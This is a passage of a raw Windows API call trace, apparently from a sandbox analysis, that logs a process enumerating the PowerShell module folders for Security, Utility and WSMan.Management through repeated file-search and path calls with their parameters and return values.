lpOldMode=0x1b81e460) returned 1 [0264.947] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.947] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.947] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security", lpFilePart=0x0) returned 0x50 [0264.947] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\", lpFilePart=0x0) returned 0x51 [0264.947] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.947] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.947] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x296, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security.psd1", cAlternateFileName="")) returned 1 [0264.947] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0264.947] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.948] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.948] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.948] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security", nBufferLength=0x105, lpBuffer=0x1b81e100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security", lpFilePart=0x0) returned 0x50 [0264.948] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e540) returned 1 [0264.948] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.security"), fInfoLevelId=0x0, lpFileInformation=0x1b81e620 | out: lpFileInformation=0x1b81e620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0264.948] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e500) returned 1 [0264.948] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e570) returned 1 [0264.948] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security", nBufferLength=0x105, lpBuffer=0x1b81e060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security", lpFilePart=0x0) returned 0x50 [0264.948] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\", lpFilePart=0x0) returned 0x51 [0264.948] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\*", lpFindFileData=0x1b81e210 | out: lpFindFileData=0x1b81e210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.948] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.948] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x296, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security.psd1", cAlternateFileName="")) returned 1 [0264.949] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x296, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security.psd1", cAlternateFileName="")) returned 0 [0264.949] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.949] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e4c0) returned 1 [0264.949] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e480) returned 1 [0264.949] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.security\\microsoft.powershell.security.psd1")) returned 0x20 [0264.949] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.949] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", lpFilePart=0x0) returned 0x4f [0264.949] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\", lpFilePart=0x0) returned 0x50 [0264.949] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dafc0 [0264.949] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.987] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psd1", cAlternateFileName="")) returned 1 [0264.987] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psm1", cAlternateFileName="")) returned 1 [0264.987] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psm1", cAlternateFileName="")) returned 0 [0264.988] FindClose (in: hFindFile=0x1a8dafc0 | out: hFindFile=0x1a8dafc0) returned 1 [0264.988] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.988] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.988] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.988] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", lpFilePart=0x0) returned 0x4f [0264.988] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\", lpFilePart=0x0) returned 0x50 [0264.988] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.988] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.988] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psd1", cAlternateFileName="")) returned 1 [0264.989] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psm1", cAlternateFileName="")) returned 1 [0264.989] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0264.989] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.989] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.989] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.989] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x105, lpBuffer=0x1b81e100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", lpFilePart=0x0) returned 0x4f [0264.989] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e540) returned 1 [0264.989] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility"), fInfoLevelId=0x0, lpFileInformation=0x1b81e620 | out: lpFileInformation=0x1b81e620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0264.989] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e500) returned 1 [0264.989] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e570) returned 1 [0264.989] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x105, lpBuffer=0x1b81e060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", lpFilePart=0x0) returned 0x4f [0264.989] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\", lpFilePart=0x0) returned 0x50 [0264.989] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\*", lpFindFileData=0x1b81e210 | out: lpFindFileData=0x1b81e210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.990] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.990] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psd1", cAlternateFileName="")) returned 1 [0264.990] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psm1", cAlternateFileName="")) returned 1 [0264.991] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psm1", cAlternateFileName="")) returned 0 [0264.991] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.991] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e4c0) returned 1 [0264.992] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.992] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.992] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3159a2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3159a2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3159a2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management.psd1", cAlternateFileName="")) returned 1 [0264.992] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3159a2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3159a2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3159a2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management.psd1", cAlternateFileName="")) returned 0 [0264.993] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.993] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.993] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.993] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.993] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management", lpFilePart=0x0) returned 0x4d [0264.993] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management\\", lpFilePart=0x0) returned 0x4e [0264.993] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dafc0 [0264.993] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.993] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3159a2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3159a2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3159a2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management.psd1", cAlternateFileName="")) returned 1 [0264.994] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, 